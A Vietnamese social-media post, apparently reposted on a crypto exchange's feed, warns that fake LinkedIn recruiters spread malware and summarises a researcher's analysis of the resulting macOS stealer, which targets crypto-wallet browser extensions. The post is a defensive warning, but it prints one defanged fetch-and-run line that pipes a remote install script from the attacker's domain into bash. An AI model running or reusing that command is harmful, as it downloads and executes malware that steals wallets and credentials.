hãy cẩn thận với các cuộc phỏng vấn giả mạo. chúng hiện là một trong những phương thức phân phối phần mềm độc hại sạch nhất.


anh trai tôi suýt nữa đã bị dính trong tuần này.
kịch bản, từng bước một:
> một "nhà tuyển dụng" nhắn tin cho anh ấy trên linkedin
> họ thực sự đã đọc hồ sơ của anh ấy. họ biết công nghệ của anh ấy. họ đặt lịch phỏng vấn thật.
> vài giờ trước cuộc gọi: "Bạn có thể xem qua trang sản phẩm của chúng tôi nhanh trước khi chúng ta nói chuyện không?"
> truy cập trang web chạy cái này trong nền:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
nếu bạn nhập mật khẩu khi nó yêu cầu, mọi chuyện kết thúc.
một nhà nghiên cứu (Darksp33d trên Github) đã phân tích ngược binary:
> mọi chuỗi cấu hình đều mã hóa bằng 570 hàm tùy chỉnh độc quyền
> sau khi giải mã: máy chủ c2 đầy đủ, danh sách endpoint hoàn chỉnh, và một dsn theo dõi lỗi sentry liên kết về nhà phát triển theo lệnh khám xét hợp pháp
> 276 id extension chrome nhắm mục tiêu, bao gồm 188 ví crypto
> sự trùng lặp TTP với "phỏng vấn lây nhiễm" của DPRK là mạnh
> 9/64 trên virustotal. crowdstrike, sophos, malwarebytes, tất cả đều bỏ sót
nhà tuyển dụng thật, hồ sơ thật, lịch phỏng vấn thật, trang web trông thật. một dòng curl có thể rút sạch ví của bạn.
nếu một "nhà tuyển dụng" từng yêu cầu bạn chạy bất cứ thứ gì trong terminal, kể cả một script build vô hại trước cuộc phỏng vấn kỹ thuật, hãy đóng tab lại.
Xem bản gốc
post-image
Trang này có thể chứa nội dung của bên thứ ba, được cung cấp chỉ nhằm mục đích thông tin (không phải là tuyên bố/bảo đảm) và không được coi là sự chứng thực cho quan điểm của Gate hoặc là lời khuyên về tài chính hoặc chuyên môn. Xem Tuyên bố từ chối trách nhiệm để biết chi tiết.
  • Phần thưởng
  • Bình luận
  • Đăng lại
  • Retweed
Bình luận
Thêm một bình luận
Thêm một bình luận
Không có bình luận
  • Ghim